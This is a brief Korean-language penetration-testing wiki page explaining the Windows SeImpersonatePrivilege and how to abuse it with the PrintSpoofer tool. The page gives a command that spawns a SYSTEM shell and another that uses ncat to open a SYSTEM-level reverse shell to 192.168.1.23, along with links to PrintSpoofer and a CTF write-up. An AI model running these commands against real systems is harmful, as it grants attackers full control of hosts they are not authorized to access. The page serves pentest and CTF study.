SeImpersonatePrivilege

SeImpersonatePrivilege는 다른 사용자를 가장할 수 있는 권한입니다. 일반적으로 사용자 가장은 서비스나 시스템 계정에서 자동화된 업무를 위해 할당하는 권한입니다.

Abuse

LogoGitHub - itm4n/PrintSpoofer: Abusing Impersonation Privileges on Windows 10 and Server 2019GitHub
# PTY 쉘에서 시스템 권한 상승
.\PrintSpoofer.exe -i -c cmd

# Non-PTY 쉘에서 시스템 권한의 리버스쉘 획득
.\PrintSpoofer.exe -c "C:\Tools\ncat.exe 192.168.1.23 10005 -e cmd"

References

LogoGitHub - itm4n/PrintSpoofer: Abusing Impersonation Privileges on Windows 10 and Server 2019GitHub
Logo10. Squid (WARM UP) - Windows (2)* privileges / PrintSpoofer64TISTORY
PreviousWindowsNextUnquoted Service Path

Last updated

Was this helpful?